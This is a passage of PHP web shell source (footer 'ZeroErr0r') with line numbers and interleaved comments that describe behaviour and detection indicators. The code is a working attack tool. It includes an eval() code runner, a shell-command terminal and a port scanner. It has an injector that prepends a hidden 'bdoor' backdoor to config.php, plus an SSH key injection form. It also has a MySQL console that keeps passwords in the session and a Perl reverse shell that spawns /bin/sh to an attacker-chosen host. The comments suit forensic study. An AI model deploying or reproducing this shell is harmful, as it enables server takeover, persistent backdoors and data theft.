595
596 <form action="" method="post">
597 <textarea name="content" spellcheck="false" autofocus><?php echo $content ?></textarea>
598 <input type="hidden" name="dest" value="<?php echo $_GET['view'] ?>">
599 <input type="submit" name="edit" value="Save!">
600 </form>
601
602 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'upload') { ?>
603
604 <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;">
605 <p style="margin: 0;font-size: 1.2rem;">Local File Upload</p>
606 <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>">
607 <input type="file" name="files">
608 <input type="submit" name="upload" value="Upload!">
609 </form>
610 <br><br>
611 <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;">
612 <p style="margin: 0;font-size: 1.2rem;">Remote File Upload</p>
613 <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>">
614 <input type="text" name="remote_file" placeholder="Remote File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relative;top:-1px; width: 200px;">
615 <input type="submit" name="remote_upload" value="Upload!">
616 </form>
617
618 <!-- EVALUATE -->
619 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'evaluate') { ?>
620 <form action="?view=evaluate" method="post">
621 <textarea name="eval_code" spellcheck="false" style="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_POST['eval_code']; } ?></textarea>
622 <input type="submit" name="eval" value="Go!">
623 <select name="language">
624 <option value="php">php</option>
625 <!-- <option value="python">python</option>
626 <option value="perl">perl</option>
627 <option value="nodejs">nodejs</option>
628 <option value="ruby">ruby</option> -->
629 </select>
630 </form>
<?php
// Arbitrary PHP execution: the POSTed textarea body is passed to eval() verbatim,
// with its output written inside the <pre class="result"> element. $lang is only
// ever compared against 'php'; the other <option>s in the form are commented out.
if (isset($_POST['eval'])) {
    $code = $_POST['eval_code'];
    $lang = $_POST['language'];
    echo '<pre class="result">';
    if ($lang == 'php') {
        eval($code);
    }
    echo '</pre>';
}
?>
642
643 <!-- INFO -->
644 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info') { ?>
645 <div class="server_info">
646 <p class="info_head" onclick="toggle(this)">Server Info</p>
647 <table class="off">
648 <tr>
649 <td>Root Disk</td>
650 <td><?php echo (formatSizeUnits(disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_total_space("/")); ?></td>
651 </tr>
652 <tr>
653 <td>PHP</td>
654 <td><?php echo phpversion() ?></td>
655 </tr>
656 <tr>
657 <td>Python</td>
658 <td><?php if(which("python")) { echo shell_exec("python --version 2>&1"); } ?></td>
659 </tr>
660 <tr>
661 <td>Curl</td>
662 <td><?php if(function_exists('curl_version')) { $v = curl_version(); echo $v['version']; } ?></td>
663 </tr>
664 <tr>
665 <td>tar</td>
666 <td><?php if(which("tar")) { echo shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td>
667 </tr>
668 <tr>
669 <td>Perl</td>
670 <td><?php if(which("perl")) { echo shell_exec("perl -e 'print $];'"); } ?></td>
671 </tr>
672 <tr>
673 <td>GCC</td>
674 <td><?php if(which("perl")) { echo shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td>
675 </tr>
676 </table>
677 <p class="info_head" onclick="toggle(this)">PHP Configuration</p>
678 <table class="off">
679 <?php
680 foreach (parse_ini_file(php_ini_loaded_file()) as $key => $value) {
681 echo "<tr>";
682 echo "<td>" . $key . "</td>";
683 echo "<td>" . $value . "</td>";
684 echo "</tr>";
685 }
686 ?>
687 </table>
688 </div>
689
690 <!-- TERMINAL -->
691 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'terminal') { ?>
<pre style="height: 300px;word-wrap: break-word;"><code class="sh"><?php if (isset($_GET['cmd'])) {
    // Command execution via a GET parameter (`?view=terminal&cmd=...`), so each
    // command typically also appears as a URL in the web server's access log.
    $cmd = $_GET['cmd'];
    // Pseudo `cd`: detected with strpos(), so any command that merely contains
    // the substring "cd" takes this branch. The target is the token after the
    // first literal "cd" token, resolved against the cwd and stored in the
    // session for later requests; a client-side redirect then reloads the view.
    if (strpos($_GET['cmd'], 'cd') !== false) {
        $tmp = explode(" ", $_GET['cmd']);
        $direct = getcwd() . "/" . $tmp[array_search('cd', $tmp) + 1];
        chdir($direct);
        $_SESSION['cd'] = $direct;
        echo "<script>document.location = '?view=terminal';</script>";
    }
    // `edit <file>` as the first token redirects to the editor view for that file.
    $tmp = explode(" ", $_GET['cmd']);
    if (array_search('edit', $tmp) === 0) {
        $direct = getcwd() . "/" . $tmp[array_search('edit', $tmp) + 1];
        echo "<script>document.location = '?view=" . urlencode($direct) . "&action=edit';</script>";
    }
    // The command still runs in every case (including after the `cd`/`edit`
    // redirects above). stderr is merged via " 2>&1"; the output is HTML-escaped.
    echo htmlentities(ex($cmd . " 2>&1"));

} ?></code></pre>
709 <br>
710 <form action="?" method="get">
711 <input type="hidden" name="view" value="terminal">
712 <?php echo get_current_user(); ?>:
713 <input id="cmd" type="text" name="cmd" spellcheck="false" autocomplete="off" value="" autofocus placeholder=" shell command -">
714 </form>
715
716 <!-- PORT_SCANNER -->
717 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port_scanner') { ?>
718 <form action="" method="post" class="port_scanner">
719 <table>
720 <tr>
721 <td width="10%">Host:</td>
722 <td width="90%"><input type="text" name="host" value="localhost" autocomplete="off" spellcheck="false"></td>
723 </tr>
724 <tr>
725 <td width="10%">Port Start:</td>
726 <td width="90%"><input type="text" name="sport" value="0" autocomplete="off" spellcheck="false"></td>
727 </tr>
728 <tr>
729 <td width="10%">Port End:</td>
730 <td width="90%"><input type="text" name="eport" value="5000" autocomplete="off" spellcheck="false"></td>
731 </tr>
732 </table>
733 <input type="submit" name="scan" value="SCAN!">
734 </form>
735 <?php if (isset($_POST['scan'])) { ?>
736 <div class="result" style="background-color: #071414;padding: 0;padding-top: 20px;">
737 <table>
738 <?php
739 $start = strip_tags($_POST['sport']);
740 $end = strip_tags($_POST['eport']);
741 $host = strip_tags($_POST['host']);
742 for($i = $start; $i<=$end; $i++){
743 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
744 if($fp){
745 if ($i == 22 OR $i == 2222) {
746 echo '<tr><td width="5%" style="background-color: #FFA800;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to SSH Injection</td></tr>';
747 } else {
748 echo '<tr><td width="5%" style="background-color: #16A086;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>';
749 }
750 }
751 flush();
752 }
753 ?>
754 </table>
755 </div>
756 <?php } ?>
757
758 <!-- INJECTOR -->
759 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
760 <?php if (!isset($_GET['action'])) { ?>
761 <form action="" method="post" class="port_scanner">
762 <table>
763 <tr>
764 <td width="30%">Injectable File Path:</td>
765 <td width="70%"><input type="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR . 'config.php'; ?>" autocomplete="off" spellcheck="false"></td>
766 </tr>
767 <tr>
768 <td width="30%">Code Type:</td>
769 <td width="70%"><select name="inject_code_type">
770 <option value="reverse_command">Reverse Command</option>
771 </select></td>
772 </tr>
773 <tr>
774 <td width="30%">Language:</td>
775 <td width="70%"><select name="inject_lang">
776 <option value="reverse_command">PHP</option>
777 </select></td>
778 </tr>
779 </table>
780 <input type="submit" name="inject" value="INJECT CODE!">
781 </form>
782 <?php if (isset($_POST['inject'])) { ?>
783 <pre class="result" style="font-size: 1.3rem;"><?php
// Code-injector handler. Prepends a self-contained PHP implant ("bdoor") to
// the file named in inject_path -- the form defaults to the current
// directory's config.php -- or creates that file if it does not exist. The
// original file body is kept intact after the implant, so the hosting
// application keeps working and the modification is not noticed through
// breakage; file mtime and a size increase of roughly the implant's length
// are the filesystem-side indicators.
784 $path = strip_tags($_POST['inject_path']);
// inject_code_type / inject_lang are read but never used: the form offers a
// single option for each.
785 $type = strip_tags($_POST['inject_code_type']);
786 $lang = strip_tags($_POST['inject_lang']);
// Per-injection token baked into the implant and printed once below. It is
// derived from rand(), i.e. not a cryptographic secret, and is stored nowhere
// on the server except inside the implant itself.
787 $token = md5(rand(111111, 999999));
// Implant behaviour as written: on any POST it base64-decodes the 'cmd'
// parameter, checks 'token', keeps a working directory in $_SESSION["cd"],
// runs the command via shell_exec() and echoes the result wrapped in the
// {USER} / {SERVER} / {SYMBOL} / {PATH} marker strings. Those markers, the
// literal 'function bdoor(' and the trailing '@bdoor(); ?>' are stable
// strings to search for across a web root; a PHP file whose first bytes are
// '<?php function bdoor()' was modified by this tool.
788 $code = '<?php function bdoor(){@session_start();if(isset($_SESSION["cd"])){chdir($_SESSION["cd"]);}if($_SERVER["REQUEST_METHOD"]=="POST"){$cmd=base64_decode($_POST["cmd"])." 2>&1";if($_POST["token"]!="' . $token . '"){echo"Error: invalid token!";die();}if(strpos($cmd,"cd")!==false){$tmp=explode(" ",$cmd);$direct=getcwd()."/".$tmp[array_search("cd",$tmp)+1];chdir($direct);$_SESSION["cd"]=$direct;}if(0==posix_getuid()){$sym="#";}else{$sym="$";}echo "{USER}".get_current_user()."{USER}"."{SERVER}".$_SERVER["SERVER_NAME"]."{SERVER}"."{SYMBOL}" . $sym . "{SYMBOL}" . "{PATH}".getcwd()."{PATH}".shell_exec($cmd);die();}}@bdoor(); ?>';
789 $pathinfo = pathinfo($path);
// Only the directory's writability is checked, never the file's; fopen() and
// fwrite() return values are ignored, so a read-only target in a writable
// directory is still reported as "injected" below (on PHP 8, fwrite() on a
// false handle throws a TypeError instead).
790 if (is_writable($pathinfo['dirname'])) {
791 if (!file_exists($path)) {
792 $file = fopen($path, 'w+');
793 fwrite($file, $code);
794 fclose($file);
795 } else {
// Existing file: implant first, original content unchanged after it.
796 $content = file_get_contents($path);
797 $content = $code . $content;
798
799 $file = fopen($path, "w");
800 fwrite($file, $content);
801 fclose($file);
802 }
803
804 echo "[+] Message: code has been injected!<br>";
805 echo "[+] Method: POST<br>";
// Web path is derived by stripping DOCUMENT_ROOT (separators normalised) from
// the filesystem path; the implant is reachable there as long as the web
// server serves that directory.
806 echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>";
807 echo "[+] Variable: cmd<br>";
808 echo "[+] Token: " . $token;
809 } else { echo "[-] Error: permission denied!"; }
810 ?>
811 </pre><?php } ?>
812 <?php } else if (isset($_GET['action']) AND $_GET['action'] == 'ssh') { ?>
813 <form action="" method="post">
814 <textarea style="height: 200px;" name="pub_key" placeholder="Enter the public key here!"></textarea>
815 <input type="submit" name="inject_key" value="INJECT KEY!">
816 </form>
817 <?php } ?>
818
819
820 <!-- DATABASE -->
821 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'database') { ?>
822 <form action="?view=database" method="post" class="port_scanner">
823 <?php if (isset($_SESSION['mysql_user'])) { ?>
824 <select name="mysql_db">
825 <?php
// Database picker: reconnects with the credentials the connect_mysql handler
// stored in $_SESSION and lists every database the account can see.
826 $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']);
827
// On failure mysqli_error() is printed but execution continues with
// $result === false; the loop below then calls mysqli_fetch_row(false), which
// on PHP 8 is a TypeError rather than an empty list (verify for the target
// PHP version).
828 if (!($result=mysqli_query($link,"show databases"))) {
829 printf("Error: %s\n", mysqli_error($link));
830 }
831
// Database names are written into the <option> markup unescaped. They are
// server-supplied here, but the pattern is the same one that makes the query
// runner below unsafe for untrusted cell values.
832 while( $row = mysqli_fetch_row( $result ) ){
// Loose '==' comparison against the posted selection; pre-selects the
// database the previous request used.
833 if (isset($_POST['mysql_db'])) {
834 if ($row[0] == $_POST['mysql_db']) {
835 echo "<option value='" . $row[0] . "' selected>" . $row[0] . "</option>";
836 } else {
837 echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>";
838 }
839 } else {
840 echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>";
841 }
842 }
843 ?>
844 </select><br><br>
845 <textarea name="mysql_query" style="border: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" placeholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_query']; } ?></textarea>
846 <input type="submit" name="execute_mysql" value="EXECUTE QUERY!">
847 <?php } else { ?>
848 <table>
849 <tr>
850 <td width="20%">MySQL Server:</td>
851 <td width="80%"><input type="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="false"></td>
852 </tr>
853 <tr>
854 <td width="20%">User:</td>
855 <td width="80%"><input type="text" name="mysql_user" autocomplete="off" spellcheck="false"></td>
856 </tr>
857 <tr>
858 <td width="20%">Password:</td>
859 <td width="80%"><input type="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td>
860 </tr>
861 </table><br>
862 <input type="submit" name="connect_mysql" value="CONNECT!">
863 </form>
864 <?php } ?>
865 <?php if (isset($_POST['connect_mysql'])) {
// MySQL login handler: takes server / user / password straight from POST,
// probes them with mysqli_connect() and on success keeps all three --
// including the password in clear text -- in $_SESSION for the rest of the
// session. Whatever backs the PHP session store (presumably session files,
// but confirm on the host) therefore contains the database password; the
// 'mysql_pass' key is the string to look for during incident response.
866 $server = $_POST['mysql_server'];
867 $user = $_POST['mysql_user'];
868 $pass = $_POST['mysql_pass'];
869
870 $link = mysqli_connect($server,$user,$pass);
871
872 if ($link) {
873 $_SESSION['mysql_user'] = $user;
874 $_SESSION['mysql_pass'] = $pass;
875 $_SESSION['mysql_server'] = $server;
// Client-side redirect (headers are already sent by this point in the page).
876 echo "<script>document.location = '?view=database';</script>";
877 } else {
878 echo "<div class='result'>Could not connect, check the credential</div>";
879 }
880
// Dead code below: a leftover database listing from an earlier revision.
881 // if (!($result=mysqli_query($link,$query))) {
882 // printf("Error: %s\n", mysqli_error($link));
883 // }
884
885 // while( $row = mysqli_fetch_row( $result ) ){
886 // if (($row[0]!="information_schema") && ($row[0]!="mysql")) {
887 // echo $row[0]."\r\n";
888 // }
889 // }
890
891 } ?>
892
893 <?php if (isset($_POST['execute_mysql'])) { ?>
894 <table class="result" style="overflow: auto;"><?php
// Ad-hoc query runner: executes whatever the textarea contains against the
// selected database with the session-stored credentials and renders the
// result set as an HTML table. Failure paths are unhandled -- a bad statement
// leaves $query === false and mysqli_fetch_assoc(false) throws on PHP 8, and
// an empty result set makes $row null so the first foreach warns.
// Detection note: this activity surfaces in the MySQL general/audit log as
// free-form statements from the web application's account, outside its
// normal statement set.
895 $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']);
896 $query = mysqli_query($link, $_POST['mysql_query']);
// The first row is fetched only to obtain the column names for the header.
897 $row = mysqli_fetch_assoc($query);
898
899 echo "<tr>";
900 foreach ($row as $key => $value) {
901 echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $key . "</td>";
902 }
903 echo "</tr>";
904
// Rewind so the data loop starts again from row 0.
905 mysqli_data_seek( $query, 0 );
906 while( $row = mysqli_fetch_assoc( $query ) ) {
907 echo "<tr>";
// Cell values are emitted unescaped (no htmlspecialchars()).
908 foreach ($row as $key => $value) {
909 echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $value . "</td>";
910 }
911 echo "</tr>";
912 }
913 ?></table>
914 <?php } ?>
915
916
917 <!-- NETWORKING -->
918 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'networking') { ?>
919
920 <div class="networking port_scanner">
921 <form action="" method="post" style="border: 1px solid #666;padding: 40px; background: #111;">
922 <h3 style="font-weight: normal;">Back Connect [Perl]</h3><br>
923 <table>
924 <tr>
925 <td>IP: <input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'] ?>" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto; margin-right: 20px;">
926 Port: <input type="text" name="port" value="1337" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto;">
927 <input type="submit" name="reverse_connect_perl" value="CONNECT!" style="margin: 0; padding: 9px 20px; margin-left: 30px;"></td>
928 </tr>
929 </table>
930 <?php
// Reverse-shell launcher. ex() is not defined in this part of the file --
// presumably the shell's command-execution helper; confirm against the top
// of the file. The perl one-liner connects from the server to
// $_POST['ip']:$_POST['port'] (the form defaults to the visitor's REMOTE_ADDR
// and 1337), redirects its STDIN/STDOUT/STDERR onto that socket and exec()s
// /bin/sh -i; the trailing '&' backgrounds it so the HTTP request returns.
// Only the port is intval()'d; ip is spliced into the shell string unquoted.
// Host-side indicators: a perl process whose parent is the web-server worker,
// with 'use Socket' and '/bin/sh -i' in its argv, holding an outbound TCP
// connection.
931 if (isset($_POST['reverse_connect_perl'])) {
932 ex('perl -e \'use Socket;$i="' . $_POST['ip'] . '";$p=' . intval($_POST['port']) . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' &');
933 echo "<br><pre>";
// The banner is unconditional: nothing here checks whether the connection
// actually succeeded.
934 echo "+----------------------------------------------------+\n";
935 echo "| [INFO] connection established in the background! |\n";
936 echo "+----------------------------------------------------+\n\n";
// Operator's own check that the backgrounded perl process survived the
// request; the same process listing is what a responder would look at.
937 echo ex("ps aux | grep perl");
938 echo "</pre>";
939 }
940 ?>
941 </form>
942 </div>
943
944
945 <?php } ?>
946 </div>
947</section>
948<footer>Copyright ©ZeroErr0r - <?php echo date('Y') ?></footer>
949
950<script type="text/javascript">
// File-manager helper: prompt for a new name, then navigate to the rename
// endpoint (?from=...&to=...). console.log() runs before the null check, so
// cancelling the prompt throws (to is null) instead of returning quietly.
// Neither value is URL-encoded.
951 function rename(rename_path, file) {
952 var to = prompt("Enter a new file name", file);
953 console.log(to.length);
954 if (to !== null && to.length > 0) {
955 document.location = "?from=" + rename_path + "&to=" + to;
956 }
957 }
958
// File-manager helper: prompt for a file name and navigate to the create-file
// endpoint (?touch=...&file=...). Values are not URL-encoded.
959 function touch(touch_path) {
960 var to = prompt("Enter a file name");
961 if (to !== null && to.length > 0) {
962 document.location = "?touch=" + touch_path + "&file=" + to;
963 }
964 }
965
// File-manager helper: prompt for a folder name and navigate to the
// create-directory endpoint (?mkdir_path=...&folder=...). Values are not
// URL-encoded.
966 function mkdir(mkdir_path) {
967 var to = prompt("Enter a folder name");
968 if (to !== null && to.length > 0) {
969 document.location = "?mkdir_path=" + mkdir_path + "&folder=" + to;
970 }
971 }
972
// Live collection of the file-list checkboxes (class 'file_select').
973 var file_select = document.getElementsByClassName('file_select');
// Highlights the rows of checked files. showAction() is not defined in this
// excerpt -- presumably it reveals the bulk-action toolbar; confirm.
974 function fileSelectCheck() {
975 showAction();
976 for (var i = 0; i < file_select.length; i++) {
977 if (file_select[i].checked) {
978 file_select[i].setAttribute('style', 'opacity:1;');
// Checkbox -> <td> -> <tr>: the row gets the highlight colour.
979 document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', "background-color: #1A272E");
980 } else {
981 file_select[i].setAttribute('style', '');
982 document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', '');
983 }
984 }
985 }
986
// Bulk delete: collects the values of the checked file_select boxes and
// navigates to ?rmfile0=...&rmfile1=...&multirmfile=N. Those query keys are
// the request signature of this action in web-server logs.
987 function filesDelete() {
988 var files = [];
989 var s = document.getElementsByClassName('file_select');
990 var c = 0;
991 for (var i = 0; i < s.length; i++) {
992 if (s[i].checked) {
993 files[c] = s[i].value;
994 c++;
995 }
996 }
997
// total starts at 1, so multirmfile is (number of files + 1); the server-side
// handler must account for that off-by-one.
998 var q = "", total = 1;
999 for (var i = 0; i < files.length; i++) {
1000 q += "rmfile" + i + "=" + files[i] + "&";
1001 total++;
1002 }
1003 document.location = "?" + q + "multirmfile=" + total;
1004 }
1005
// Bulk archive: collects the checked file_select values and navigates to
// ?action=zip&file0=...&file1=...&numfiles=N. Unlike filesDelete(), the
// counter here starts at 0 so numfiles equals the file count. The
// 'action=zip' / 'numfiles' pair is the request signature of this action in
// web-server logs.
1006 function filesCompress() {
1007 var files = [];
1008 var s = document.getElementsByClassName('file_select');
1009 var c = 0;
1010 for (var i = 0; i < s.length; i++) {
1011 if (s[i].checked) {
1012 files[c] = s[i].value;
1013 c++;
1014 }
1015 }
1016
1017 var q = "", total = 0;
1018 for (var i = 0; i < files.length; i++) {
1019 q += "file" + i + "=" + files[i] + "&";
1020 total++;
1021 }
1022 document.location = "?action=zip&" + q + "numfiles=" + total;
1023 }
1024
// Flips the class of the element two siblings after `el` between 'on' and
// 'off'. nextSibling.nextSibling skips one node (presumably a whitespace text
// node between el and its target), so this depends on the exact markup.
1025 function toggle(el) {
1026 if (el.nextSibling.nextSibling.getAttribute('class') == 'on') {
1027 el.nextSibling.nextSibling.setAttribute('class', 'off')
1028 } else {
1029 el.nextSibling.nextSibling.setAttribute('class', 'on')
1030 }
1031 }
1032</script>
1033<script>hljs.initHighlightingOnLoad();</script>
1034
1035</body>
1036</html>